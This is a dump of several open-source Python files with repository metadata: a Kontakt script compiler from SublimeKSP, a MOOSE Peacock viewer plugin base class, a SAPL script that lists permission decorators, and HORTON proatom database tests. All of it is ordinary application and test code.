find_node(n, search_node, visited, path)
return path
def find_cycles(graph, ready=None):
# adapted from code at http://neopythonic.blogspot.com/2009/01/detecting-cycles-in-directed-graph.html
if ready is None:
ready = set()
todo = set(graph.keys())
while todo:
node = todo.pop()
stack = [node]
while stack:
top = stack[-1]
for node in graph[top]:
if node in stack:
raise Exception('Recursion detected: ' + '->'.join(map(str, stack + [node])))
if node in todo:
stack.append(node)
todo.remove(node)
break
else:
node = stack.pop()
ready.add(node)
return None
def topological_sort(graph):
# copied from here: http://www.logarithmic.net/pfh-files/blog/01208083168/sort.py
count = {}
# TODO: maybe replace None with empty string '' to make sorting easier
#nodes = sorted(graph.keys()) <-- OLD CODE
nodes = ['' if k is None else k for k in graph.keys()]
nodes.sort()
nodes = [None if k == '' else k for k in nodes]
for node in nodes:
count[node] = 0
for node in nodes:
for successor in graph[node]:
count[successor] += 1
ready = [node for node in nodes if count[node] == 0]
result = []
while ready:
node = ready.pop(-1)
result.append(node)
for successor in graph[node]:
count[successor] -= 1
if count[successor] == 0:
ready.append(successor)
return result
def compress_variable_name(name):
symbols = 'abcdefghijklmnopqrstuvwxyz012345'
hash = hashlib.new('sha1')
hash.update(name.encode('utf-8'))
return ''.join((symbols[ch & 0x1F] for ch in hash.digest()[:5]))
def default_read_file_func(filepath):
return open(filepath, 'r').read()
def parse_nckp(path):
'''
The prefix list is orderd to match the integer number representing each ui_control:
0. panel
1. button
2. fileselector
3. knob
4. label
5. levelmeter
6. menu
7. slider
8. switch
9. table
10. textedit
11. valueedit
12. waveform
13. wavetable
14. xypad
15. mousearea
'''
prefix = ["$", "$", "$", "$", "$", "$", "$", "$", "$", "%", "@", "$", "$", "$", "?", "$"]
cur_prefix = []
# iterate recursively into the nested data
def search_ui_in_dict_recursively(dictionary):
tree = ""
name = ""
key = 'index'
for k, v in dictionary.items():
if k == key:
cur_prefix.append(prefix[v])
tree = dictionary["value"]["common"]["id"]
yield tree
elif isinstance(v, dict):
for result in search_ui_in_dict_recursively(v):
name = (tree + "_" + result) if tree else result
yield name
elif isinstance(v, list):
for d in v:
for result in search_ui_in_dict_recursively(d):
yield result
with open(path, 'r') as read_file:
data = json.load(read_file, object_pairs_hook=OrderedDict)
ui_controls_names = list(search_ui_in_dict_recursively(data))
# pair the collected prefix to the parsed ui_control names
for i,p in enumerate(ui_controls_names):
yield cur_prefix[i]+p
def open_nckp(lines, basedir):
source = merge_lines(lines) # for checking purposes
nckp_path = '' # predeclared to avoid errors if the import_nckp ksp function is not used
ui_to_import = []
for index, l in enumerate(lines):
line = l.command
if 'import_nckp' in line:
if 'load_performance_view' in source:
if 'make_perfview' in source:
raise ParseException(Line(line, [(None, index + 1)], None), 'If \'load_performance_view\' is used \'make_perfview\' is not necessary, please remove it!\n')
nckp_path = line[line.find('(')+1:line.find(')')][1:-1]
if nckp_path:
# normalize the extracted path so that it works on Mac if it has backward slashes
nckp_path = nckp_path.replace("\\", "/")
# check if the path is relative or not
if not os.path.isabs(nckp_path):
nckp_path = os.path.join(basedir, nckp_path)
if os.path.exists(nckp_path):
ui_to_import = list(parse_nckp(nckp_path))
if not ui_to_import:
raise ParseException(Line(line, [(None, index + 1)], None), 'no controls to import from the nckp file!\n')
for i,v in enumerate(ui_to_import):
variables.add(v.lower())
ui_variables.add(v.lower())
comp_extras.add_nckp_var_to_nckp_table(v)
# Support the use of '.' variables in the compiler to reference controls with double underscores
variables.add(v.lower().replace('__', '.'))
ui_variables.add(v.lower().replace('__', '.'))
comp_extras.add_nckp_var_to_nckp_table(v.replace('__', '.'))
else:
raise ParseException(Line(line, [(None, index + 1)], None), '.nkcp file not found at: <' + os.path.abspath(nckp_path) + '> !\n')
else:
raise ParseException(Line(line, [(None, index + 1)], None), 'import_nckp used but no load_performance_view found in the script!\n')
return bool(ui_to_import)
def strip_import_nckp_function_from_source(lines):
for line_obj in lines:
line = line_obj.command
ls_line = line.lstrip()
if 'import_nckp' in ls_line:
line_obj.command = re.sub(r'[^\r\n]', '', ls_line)
class KSPCompiler(object):
def __init__(self, source, basedir, compact=True, compactVars=False, comments_on_expansion=True, read_file_func=default_read_file_func, extra_syntax_checks=False, optimize=False, check_empty_compound_statements=False, add_compiled_date_comment=False):
self.source = source
self.basedir = basedir
self.compact = compact
self.compactVars = compactVars
self.comments_on_expansion = comments_on_expansion
self.read_file_func = read_file_func
self.optimize = optimize
self.check_empty_compound_statements = check_empty_compound_statements
self.add_compiled_date_comment = add_compiled_date_comment
self.extra_syntax_checks = extra_syntax_checks or optimize
self.abort_requested = False
self.lines = []
self.macros = []
self.module = None
self.original2short = {}
self.short2original = {}
self.output_file = None
self.variable_names_to_preserve = set()
def do_imports_and_convert_to_line_objects(self):
# Import files
self.lines = parse_lines_and_handle_imports(self.source,
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
handle_conditional_lines(self.lines) # Parse conditionals and remove lines if appropriate
# PAST THIS FUNCTION, ALL IMPORTED AND UPDATED CODE LIVES IN SELF.LINES, NOT SOURCE. DO NOT ATTEMPT TO REPRODUCE LINE OBJECTS FROM SOURCE
# TO PRESERVE LINE PROPERTIES, SELF.LINES CAN NOT BE REMERGED INTO SOURCE
def extensions_with_macros(self):
check_lines = [copy.copy(l) for l in self.lines]
for line in check_lines:
line.replace_placeholders()
check_source = merge_lines(check_lines) # only for checking purposes, not for reproducing lines
### Extensions ###
# Add tcm code if tcm.init() is found
if re.search(r'(?m)^\s*tcm.init', check_source):
self.lines += parse_lines_and_handle_imports(taskfunc_code,
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
# Add logger code if activate_logger is found.
m = re.search(r"(?m)^\s*activate_logger.*\)", check_source)
if m:
# Preparing a new source block to add called amended_logger_code
amended_logger_code = logger_code
new_comment_re = r'(?<!["\'])\/\/.*' # this is a single line new comment type //
activate_line = m.group(0).strip()
activate_line = re.sub(new_comment_re, '', activate_line)
filepath_m = re.search(r"(\"|\').*(\"|\')", str(activate_line))
if not filepath_m:
raise ParseException(Line("", [(None, 1)], None), 'No filepath in activate_logger.\n')
filepath_m_string = filepath_m.group(0)
quote_type_str = filepath_m_string[0]
filepath = filepath_m.group(0)[1:-1]
valid_file_path_flag = False
if re.search(r"(?m)^(?:\w:)?(\/[a-zA-Z_\-\s0-9\.]+)*\.nka$", filepath):
valid_file_path_flag = True
m = re.search(r"/[^/]*.nka", filepath)
filename = "_" + m.group(0).replace("/", "").replace(".nka", "").replace("-", "")
filename = re.sub(r"\s", "", filename)
amended_logger_code = amended_logger_code.replace("#name#", filename)
if re.search(r"(?m)^(?:\w:)?(\/[a-zA-Z_\-\s0-9\.]+)*\/$", filepath):
valid_file_path_flag = True
new_logger_str = "logger_filepath := filepath & %slogger.nka%s" % (quote_type_str, quote_type_str)
amended_logger_code = amended_logger_code.replace("#name#", "logger").replace("logger_filepath := filepath", new_logger_str)
if valid_file_path_flag == False:
raise ParseException(Line("", [(None, 1)], None), 'Filepath of activate_logger is invalid.\nFilepaths must be in this format: "C:/Users/Name/LogFile.nka" or "/Users/Name/LogFile.nka"')
# A persistance_changed callback function needs to be inserted if the script has one.
# Insert *directly* into self.lines if there is, or just add it to the new source block if there isn't.
pccb_start = -1
for i in range(0, len(self.lines)):
content = self.lines[i].command
m = re.search(r"(?m)^\s*on\s+persistence_changed", content)
if m:
pccb_start = i
break
if pccb_start is not -1:
pccb_end = -1
for i in range(pccb_start, len(self.lines)):
content = self.lines[i].command
if "end on" in content:
pccb_end = i
break
insert_function_line_obj = parse_lines_and_handle_imports("checkPrintFlag()",
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
replace_lines = collections.deque([])
for i in range(0, len(self.lines)):
if i == pccb_end:
replace_lines.append(insert_function_line_obj[0])
replace_lines.append(self.lines[i])
self.lines = replace_lines
else:
# if there is no persistence_changed callback then generate one
amended_logger_code = amended_logger_code + "\non persistence_changed\ncheckPrintFlag()\nend on\n"
self.lines += parse_lines_and_handle_imports(amended_logger_code,
read_file_function=self.read_file_func,
preprocessor_func=self.examine_pragmas)
###
# Run conditional stage a second time to catch the new source additions.
handle_conditional_lines(self.lines)
def search_for_nckp(self):
# Import nckp if import_nckp() found
if open_nckp(self.lines, self.basedir):
strip_import_nckp_function_from_source(self.lines)
###
def replace_string_placeholders(self):
for line in self.lines:
line.replace_placeholders()
# NOTE(Sam): Previously done in the expand_macros function, the lines are converted into a block in separately
# because the preprocessor needs to be called after the macros and before this.
def convert_lines_to_code(self):
self.code = merge_lines(self.lines)
# Isolate macros into objects, removing from code
def extract_macros(self):
self.lines, self.macros = extract_macros(self.lines)
# Run stored macros on the code
def expand_macros(self):
# Initial Expansion
normal_lines, callback_lines = expand_macros(self.lines, self.macros)
self.lines = normal_lines + callback_lines
# Nested Expansion
while macro_iter_functions(self.lines):
normal_lines, callback_lines = expand_macros(self.lines, self.macros)
self.lines = normal_lines + callback_lines
def examine_pragmas(self, code, namespaces):
# find info about output file
pragma_re = re.compile(r'\{ ?\#pragma\s+save_compiled_source\s+(.*)\}')
m = pragma_re.search(code)
if m:
dir_check = m.group(1)
if not os.path.isabs(dir_check):
if self.basedir == None:
raise Exception('Please save the file being compiled before attempting to compile to a relative path.')
dir_check = os.path.join(self.basedir, dir_check)
if not os.path.exists(os.path.dirname(dir_check)):
raise Exception('The filepath in save_compiled_source does not exist!')
else:
self.output_file = dir_check
# find info about which variable names not to compact
pragma_re = re.compile(r'\{ ?\#pragma\s+preserve_names\s+(.*?)\s*\}')
for m in pragma_re.finditer(code):
names = re.sub(r'[$!%@?~]', '', m.group(1)) # remove any prefixes
for variable_name_pattern in re.split(r'\s+,?\s*|\s*,\s+|,', names):
if len(variable_name_pattern) == 0:
continue
if namespaces:
variable_name_pattern = '__'.join(namespaces + [variable_name_pattern])
variable_name_pattern = variable_name_pattern.replace('.', '__').replace('*', '.*')
self.variable_names_to_preserve.add(variable_name_pattern)
return code
def parse_code(self):
self.module = parse(self.code)
def sort_functions_and_insert_local_variables_into_on_init(self):
# make sure that used function that uses others set the used flag of those secondary ones as well
used_functions = set()
mark_used_functions_using_depth_first_traversal(call_graph, visited=used_functions)
# check that there is no recursion among functions invoked using 'call'
find_cycles(call_graph)
# make a topological sorting of the call graph filter out the functions invoked using 'call'
function_definition_order = [function_name
for function_name in reversed(topological_sort(call_graph))
if function_name in called_functions and function_name in used_functions]
# create a lookup table from function name to function definition, remove all function definitions and then add the ones used back in the right order (as determined by the topological sorting)
function_table = dict([(func.name.identifier, func) for func in self.module.blocks if isinstance(func, ksp_ast.FunctionDef)])
self.module.blocks = [block for block in self.module.blocks if not isinstance(block, ksp_ast.FunctionDef)]
self.module.blocks = [self.module.on_init] + [function_table[func_name] for func_name in function_definition_order] + self.module.blocks[1:]
# add local variable declarations to 'on init' in case they have not already been inserted (they could have been inserted earlier if the function was invoked from the init callback)
for f in reversed(list(functions.values())):
if f.used and (f.global_declaration_statements or f.local_declaration_statements):
self.module.on_init.lines = f.global_declaration_statements + self.module.on_init.lines + f.local_declaration_statements
f.global_declaration_statements = []
f.local_declaration_statements = []
def convert_dots_to_double_underscore(self):
global variables
# convert all dots into '__' (and update the list of variables accordingly)
# Note: for historical reasons the ksp_compiler_extras functions assume
# pure KSP as input and therefor cannot handle '.' in names.
# updated the AST
name_fixer = ASTModifierNameFixer(self.module)
# updated the global list of variables similarly
variables = set(name_fixer.replace_dots_in_name(v) for v in variables)
def compact_names(self):
global variables
# build regular expression that can later tell which names to preserve (these should not undergo compaction)
preserve_pattern = re.compile(r'[$%@!?~]?(' + '|'.join(self.variable_names_to_preserve) + ')$', re.I)
for v in variables:
if self.variable_names_to_preserve and preserve_pattern.match(v):
#self.original2short[v] = v
#self.short2original[v] = v
continue
elif v not in self.original2short and v not in ksp_builtins.variables:
self.original2short[v] = '%s%s' % (v[0], compress_variable_name(v))
if self.original2short[v] in ksp_builtins.variables:
raise Exception('This is your unlucky day. Even though the chance is only 3.2%%%% the variable %s was mapped to the same hash as that of a builtin KSP variable.' % (v))
if self.original2short[v] in self.short2original:
raise Exception('This is your unlucky day. Even though the chance is only 3.2%%%% two variable names were compacted to the same short name: %s and %s' % (v, self.short2original[self.original2short[v]]))
self.short2original[self.original2short[v]] = v
ASTModifierIDSubstituter(self.original2short, force_lower_case=True).modify(self.module)
def init_extra_syntax_checks(self):
comp_extras.clear_symbol_table()
self.used_variables = set()
def generate_compiled_code(self):
buffer = StringIO()
emitter = ksp_ast.Emitter(buffer, compact=self.compact)
self.module.emit(emitter)
self.compiled_code = buffer.getvalue()
# NOTE(Sam): Add a ksp comment at the beginning of the compiled script to display the time and date it was compiled on
if self.add_compiled_date_comment:
localtime = time.asctime( time.localtime(time.time()) )
self.compiled_code = "{ Compiled on " + localtime + " }\n" + self.compiled_code
def uncompress_variable_names(self, compiled_code):
def sub_func(match_obj):
s = match_obj.group(0)
if s in self.short2original:
return self.short2original[s]
else:
return s
return varname_re.sub(sub_func, compiled_code)
def compile(self, callback=None):
global variables
init_globals()
try:
used_functions = set()
used_variables = set()
do_extra = self.extra_syntax_checks
do_optim = do_extra and self.optimize
do_emptycheck = self.check_empty_compound_statements and not do_optim
# (description, function, condition, time-weight)
tasks = [
('scanning and importing code', lambda: self.do_imports_and_convert_to_line_objects(), True, 1),
('extensions (w/ macros)', lambda: self.extensions_with_macros(), True, 1),
# NOTE(Sam): Call the pre-macro section of the preprocessor
('pre-macro processes', lambda: pre_macro_functions(self.lines), True, 1),
('parsing macros', lambda: self.extract_macros(), True, 1),
('expanding macros', lambda: self.expand_macros(), True, 1),
# NOTE(Sam): Call the post-macro section of the preprocessor
('post-macro processes', lambda: post_macro_functions(self.lines), True, 1),
('replace string placeholders', lambda: self.replace_string_placeholders(), True, 1),
('search for nckp import', lambda: self.search_for_nckp(), True, 1),
# NOTE(Sam): Convert the lines to a block in a separate function
('convert lines to code block', lambda: self.convert_lines_to_code(), True, 1),
('parse code', lambda: self.parse_code(), True, 1),
('various tasks', lambda: ASTModifierFixReferencesAndFamilies(self.module, self.lines), True, 1),
('add variable name prefixes', lambda: ASTModifierFixPrefixesIncludingLocalVars(self.module), True, 1),
('inline functions', lambda: ASTModifierFunctionExpander(self.module), True, 1),
('handle taskfunc', lambda: ASTModifierTaskfuncFunctionHandler(self.module), True, 1),
('handle local variables', lambda: self.sort_functions_and_insert_local_variables_into_on_init(), True, 1),
('add variable name prefixes', lambda: ASTModifierFixPrefixesAndFixControlPars(self.module), True, 1),
('convert dots to underscore', lambda: self.convert_dots_to_double_underscore(), True, 1),
('init extra syntax checks', lambda: self.init_extra_syntax_checks(), do_extra, 1),
('check types', lambda: comp_extras.ASTVisitorDetermineExpressionTypes(self.module), do_extra, 1),
('check types', lambda: comp_extras.ASTVisitorCheckStatementExprTypes(self.module), do_extra, 1),
('check declarations', lambda: comp_extras.ASTVisitorCheckDeclarations(self.module), do_extra, 1),
('simplying expressions', lambda: comp_extras.ASTModifierSimplifyExpressions(self.module, True), do_optim, 1),
('removing unused branches', lambda: comp_extras.ASTModifierRemoveUnusedBranches(self.module), do_optim, 1),
('removing unused functions', lambda: comp_extras.ASTVisitorFindUsedFunctions(self.module, used_functions), do_optim, 1),
('removing unused functions', lambda: comp_extras.ASTModifierRemoveUnusedFunctions(self.module, used_functions), do_optim, 1),
('removing unused variables', lambda: comp_extras.ASTVisitorFindUsedVariables(self.module, used_variables), do_optim, 1),
('removing unused variables', lambda: comp_extras.ASTModifierRemoveUnusedVariables(self.module, used_variables), do_optim, 1),
('checking empty if-stmts', lambda: comp_extras.ASTVisitorCheckNoEmptyIfCaseStatements(self.module), do_emptycheck, 1),
('compact variable names', self.compact_names, self.compactVars, 1),
('generate code', self.generate_compiled_code, True, 1),
]
# keep only tasks where the execution-condition is true
tasks = [(desc, func, time) for (desc, func, condition, time) in tasks if condition]
total_time = float(sum(t[-1] for t in tasks))
time_so_far = 0
for (desc, func, time) in tasks:
if callback:
callback(desc, 100 * time_so_far/total_time) # parameters are: description, percent done
func()
time_so_far += time
if self.abort_requested:
return False
return True
except ksp_ast.ParseException as e:
#raise # TEMPORARY
messages = []
if isinstance(e.node, lex.LexToken):
line_numbers = [e.node.lineno]
else:
line_numbers = [e.node.lineno] + [n.lineno for n in e.node.lexinfo[2]]
messages = ['%s' % str(e)]
for indent, line_number in enumerate(line_numbers):
line = self.lines[line_number]
message = '\n'.join(messages)
raise ParseException(line, message)
def abort_compilation(self):
self.abort_requested = True
if __name__ == "__main__":
import sys
import os
import os.path
import codecs
import argparse
# definition of argsparse.FileType in Python 3.4 (with support for encoding) - in case we're running Python 3.3
class FileType(object):
def __init__(self, mode='r', bufsize=-1, encoding=None, errors=None):
self._mode = mode
self._bufsize = bufsize
self._encoding = encoding
self._errors = errors
def __call__(self, string):
# the special argument "-" means sys.std{in,out}
if string == '-':
if 'r' in self._mode:
return sys.stdin
elif 'w' in self._mode:
return sys.stdout
else:
msg = _('argument "-" with mode %r') % self._mode
raise ValueError(msg)
# all other arguments are used as file names
try:
return open(string, self._mode, self._bufsize, self._encoding, self._errors)
except OSError as e:
message = _("can't open '%s': %s")
raise ArgumentTypeError(message % (string, e))
def __repr__(self):
args = self._mode, self._bufsize
kwargs = [('encoding', self._encoding), ('errors', self._errors)]
args_str = ', '.join([repr(arg) for arg in args if arg != -1] +
['%s=%r' % (kw, arg) for kw, arg in kwargs
if arg is not None])
return '%s(%s)' % (type(self).__name__, args_str)
# parse command line arguments
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--compact', dest='compact', action='store_true', default='false', help='Minimize whitespace in compiled code')
arg_parser.add_argument('--compact_variables', dest='compact_variables', action='store_true', default='false', help='Shorten and obfuscate variable names')
arg_parser.add_argument('--extra_syntax_checks', dest='extra_syntax_checks', action='store_true', default='false', help='Additional syntax checks')
arg_parser.add_argument('--optimize', dest='optimize', action='store_true', default='false', help='Optimize the generated code')
arg_parser.add_argument('--nocompiledate', dest='add_compiled_date_comment', action='store_true', default='true', help='Remove the compiler date argument')
arg_parser.add_argument('source_file', type=FileType('r', encoding='latin-1'))
arg_parser.add_argument('output_file', type=FileType('w', encoding='latin-1'), nargs='?')
args = arg_parser.parse_args()
# determine the base directory of the source file
if args.source_file.name != '<stdin>':
basedir = os.path.dirname(args.source_file.name)
else:
basedir = None
# function for reading imported modules
def read_file_func(filepath):
if not os.path.isabs(filepath):
if basedir is None:
raise Exception('Relative import paths not supported when the base path of the source file is unknown')
else:
filepath = os.path.join(basedir, filepath)
return codecs.open(filepath, 'r', 'latin-1').read()
# make sure that extra syntax checks are enabled if --optimize argument is used
if args.optimize == True and args.extra_syntax_checks == False:
args.extra_syntax_checks = True
# read the source and compile it
code = args.source_file.read()
compiler = KSPCompiler(
code,
basedir,
compact=args.compact,
compactVars=args.compact_variables,
comments_on_expansion=False,
read_file_func=read_file_func,
extra_syntax_checks=args.extra_syntax_checks,
optimize=args.optimize,
check_empty_compound_statements=False,
add_compiled_date_comment=(not args.nocompiledate))
compiler.compile()
# write the compiled code to output
code = compiler.compiled_code.replace('\r', '')
output = args.output_file
if output is None:
output_path = compiler.output_file
if not os.path.isabs(output_path):
output_path = os.path.join(basedir, output_path)
output = codecs.open(output_path, 'w', encoding='latin-1')
if output:
output.write(code)
|
nojanath/SublimeKSP
|
ksp_compiler3/ksp_compiler.py
|
Python
|
gpl-3.0
| 105,491
|
[
"VisIt"
] |
528c11f6503241a36b3e84487e33ba0df729c92ed674ba310f7d48c36bea2dd8
|
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import peacock
from PyQt5 import QtWidgets
class ExodusPlugin(peacock.base.Plugin):
"""
Plugin class for the Exodus volume rendering portion of Peacock.
"""
def __init__(self, layout='LeftLayout', settings_key="", **kwargs):
super(ExodusPlugin, self).__init__(layout=layout, settings_key=settings_key, **kwargs)
self.setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.MinimumExpanding)
# Ubiquitous member variables
self._filename = None
self._variable = None
self._component = -1
self.setEnabled(False)
def onPlayStart(self):
"""
Disables the plugin when playing begins.
"""
self.setEnabled(False)
def onPlayStop(self):
"""
Enables widget when the playing stops.
"""
self.setEnabled(True)
def onSetFilename(self, filename):
"""
Stores the current filename. (see FilePlugin)
"""
self._filename = str(filename) if filename else None
self._loadPlugin()
self.updateOptions()
def onSetVariable(self, variable):
"""
Stores the current variable. (see FilePlugin)
"""
self._variable = str(variable) if variable else None
self._loadPlugin()
self.updateOptions()
def onSetComponent(self, component):
"""
Stores the current variable component. (see FilePlugin)
"""
self._component = component if (component is not None) else -1
self._loadPlugin()
self.updateOptions()
def onCurrentChanged(self, index):
"""
Called by ExodusViewer when the tab is changed.
"""
pass
def onSetEnableWidget(self, value):
"""
Enables/disables the widget after the VTKRenderWindow is created or destroyed.
"""
self.setEnabled(value)
def stateKey(self):
"""
Generates a (mostly) unique key for use in saving state of a widget.
"""
return (self._filename, self._variable, self._component)
def setup(self):
"""
Setup the Exodus widgets with a uniform margins and "flat" style.
"""
super(ExodusPlugin, self).setup()
if hasattr(self, 'MainLayout'):
self.MainLayout.setContentsMargins(5,5,5,5)
self.MainLayout.setSpacing(5)
if isinstance(self, QtWidgets.QGroupBox):
self.setFlat(True)
def _loadPlugin(self):
"""
This is called by onSetFilename/Variable/Component, use it to load the plugin state.
"""
pass
def updateOptions(self):
"""
All options for the Reader/Result/Window objects should be set for the plugin by this method.
"""
pass
|
nuclear-wizard/moose
|
python/peacock/ExodusViewer/plugins/ExodusPlugin.py
|
Python
|
lgpl-2.1
| 3,108
|
[
"MOOSE"
] |
99fbb999751c90febb2cd8d1542b01277a3caddbe4e582f373c6af8d3d81b77d
|
import ast
import inspect
import os
if __name__ == '__main__':
import django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sapl.settings")
django.setup()
if True:
from scripts.lista_urls import lista_urls
def get_decorators(cls):
target = cls
decorators = {}
def visit_FunctionDef(node):
decorators[node.name] = []
for n in node.decorator_list:
name = ''
if isinstance(n, ast.Call):
name = n.func.attr if isinstance(
n.func, ast.Attribute) else n.func.id
else:
name = n.attr if isinstance(n, ast.Attribute) else n.id
decorators[node.name].append(name)
node_iter = ast.NodeVisitor()
node_iter.visit_FunctionDef = visit_FunctionDef
node_iter.visit(ast.parse(inspect.getsource(target)))
return decorators
def get_permission_requireds(cls):
target = cls
decorators = []
def get_permission_required(arg):
for perm in arg.args:
if isinstance(perm, ast.Str):
decorators.append(getattr(perm, perm._fields[0]))
continue
if isinstance(perm, (ast.Tuple, ast.List)):
if 'elts' not in perm._fields:
continue
for elt in perm.elts:
if isinstance(elt, ast.Str):
decorators.append(getattr(elt, elt._fields[0]))
def get_method_decorator(n):
for arg in n.args:
if not isinstance(arg, ast.Call):
continue
"""
Espera-se que:
- o decorator seja uma função
- esta função tenha o meta atributo 'id'
- id = 'permission_required'
- esta função tenha argumento args
"""
if ('func' not in arg._fields or
'id' not in arg.func._fields or
arg.func.id != 'permission_required' or
'args' not in arg._fields):
continue
get_permission_required(arg)
def visit_FunctionDef(node):
for n in node.decorator_list:
if not isinstance(n, ast.Call):
continue
"""
Espera-se que:
- o decorator seja uma função
- esta função tenha o meta atributo 'id'
- id = 'method_decorator'
- esta função tenha argumento args
"""
if ('func' not in n._fields or
'id' not in n.func._fields or
n.func.id != 'method_decorator' or
'args' not in n._fields):
get_permission_required(n)
else:
get_method_decorator(n)
node_iter = ast.NodeVisitor()
node_iter.visit_FunctionDef = visit_FunctionDef
node_iter.visit(ast.parse(inspect.getsource(target)))
return decorators
class ListaPermissionInDecorators():
decorators = []
def lista_permissions_in_decorators(self):
urls = lista_urls()
for url_item in urls:
key, url, var, app_name = url_item
if hasattr(key, 'view_class'):
view = key.view_class
elif hasattr(key, 'cls'):
view = key.cls
else:
view = key
if not view.__module__.startswith('sapl.'):
continue
try:
decorators = list(map(lambda x: (x, view),
get_permission_requireds(view)
))
self.decorators += decorators
except:
pass
return self.decorators
def __call__(self):
return self.lista_permissions_in_decorators()
lista_permissions_in_decorators = ListaPermissionInDecorators()
if __name__ == '__main__':
_lista_permissions_in_decorators = lista_permissions_in_decorators()
print(_lista_permissions_in_decorators)
|
LeandroRoberto/sapl
|
scripts/lista_permissions_in_decorators.py
|
Python
|
gpl-3.0
| 4,034
|
[
"VisIt"
] |
d816c1457902b4b194fdce6be2ed001488b8c1ef635a67bb1cf7ce1be5197441
|
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2016 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
import numpy as np, h5py as h5
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
from horton.part.test.common import get_proatomdb_cp2k
from horton.test.common import tmpdir
def test_db_basics():
padb = ProAtomDB.from_refatoms(numbers=[8, 1], max_cation=1, max_anion=1)
assert padb.get_numbers() == [1, 8]
assert padb.get_charges(8) == [1, 0, -1]
assert padb.get_charges(1) == [0, -1]
r1 = padb.get_record(8, -1)
assert r1.number == 8
assert r1.charge == -1
assert abs(r1.energy - -72.587) < 1e-3
assert r1.ipot_energy == padb.get_record(8, 0).energy - r1.energy
assert r1.population == 9
assert r1.pseudo_number == 8
assert r1.pseudo_population == 9
assert r1.safe
assert r1.rgrid.size == 59
r2 = padb.get_record(8, -1)
r3 = padb.get_record(8, 0)
assert r1 == r2
assert r1 != r3
assert padb.get_rgrid(8) is r1.rgrid
assert padb.get_record(8, +1).ipot_energy is None
assert padb.get_record(8, -1).ipot_energy == padb.get_record(8, 0).energy - padb.get_record(8, -1).energy
assert padb.get_record(1, 0).ipot_energy == -padb.get_record(1, 0).energy
def test_db_basics_pseudo():
padb = get_proatomdb_cp2k()
assert padb.get_numbers() == [8, 14]
assert padb.get_charges(8) == [2, 1, 0, -1, -2]
assert padb.get_charges(8, safe=True) == [2, 1, 0, -1]
assert padb.get_charges(14) == [0]
assert not padb.get_record(8, -2).safe
assert padb.get_rgrid(8) is padb.get_record(8, -2).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, -1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 0).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 2).rgrid
r1 = padb.get_record(8, -1)
assert r1.safe
assert abs(r1.energy - -15.866511882272) < 1e-8
assert abs(r1.ipot_energy - (padb.get_record(8, 0).energy - r1.energy)) < 1e-5
r2 = padb.get_record(8, -2)
assert not r2.safe
assert abs(r2.energy - -15.464982778766) < 1e-8
assert abs(r2.ipot_energy - (r1.energy - r2.energy)) < 1e-5
assert padb.get_record(8, +2).ipot_energy is None
def test_record_basics_pseudo():
fn_out = context.get_fn('test/atom_si.cp2k.out')
mol = IOData.from_file(fn_out)
r = ProAtomRecord.from_iodata(mol)
assert r.number == 14
assert r.charge == 0
assert abs(r.energy - -3.761587698067) < 1e-10
assert r.ipot_energy is None
assert r.population == 14
assert r.pseudo_number == 4
assert r.pseudo_population == 4
assert r.safe
def compare_padbs(padb1, padb2):
assert padb1.size == padb2.size
for number in padb1.get_numbers():
for charge in padb1.get_charges(number):
r1 = padb1.get_record(number, charge)
r2 = padb2.get_record(number, charge)
assert r1 == r2
def test_io_group():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
assert padb1.size == 5
keys = sorted(padb1._map.keys())
assert keys == [(1, -1), (1, 0), (6, -1), (6, 0), (6, +1)]
with h5.File('horton.dpart.test.test_proatomdb.test_io_group', driver='core', backing_store=False) as f:
padb1.to_file(f)
padb2 = ProAtomDB.from_file(f)
compare_padbs(padb1, padb2)
def test_io_filename():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=0)
keys = sorted(padb1._map.keys())
assert keys == [(1, 0), (6, 0), (6, 1)]
with tmpdir('horton.dpart.test.test_proatomdb.test_io_filename') as dn:
filename = '%s/test.h5' % dn
padb1.to_file(filename)
padb2 = ProAtomDB.from_file(filename)
compare_padbs(padb1, padb2)
def test_compute_radii():
rgrid = RadialGrid(ExpRTransform(1e-3, 1e1, 100))
padb = ProAtomDB.from_refatoms([1, 6], 0, 0, (rgrid, 110))
record = padb.get_record(6, 0)
indexes, radii = record.compute_radii([2.0, 5.9, 5.999])
assert (indexes == [69, 90, 100]).all()
assert abs(radii - np.array([0.600577, 4.168655, 10.0])).max() < 1e-5
def test_moments():
padb = get_proatomdb_cp2k()
record0 = padb.get_record(8, 0)
record1 = padb.get_record(8, 1)
m0 = record0.get_moment(3)
m1 = record1.get_moment(3)
assert m0 > m1
assert abs(m0-21.84) < 1e-2
assert abs(m1-12.17) < 1e-2
def check_spline_record(spline, record):
assert abs(spline.y - record.rho).max() < 1e-10
assert abs(spline.dx - record.deriv).max() < 1e-10
def check_spline_pop(spline, pop):
rtf = spline.rtransform
int1d = spline.rtransform.get_default_int1d()
check_pop = 4*np.pi*dot_multi(
rtf.get_deriv(),
rtf.get_radii()**2,
spline.y,
int1d.get_weights(rtf.npoint),
)
assert abs(pop - check_pop) < 1e-2
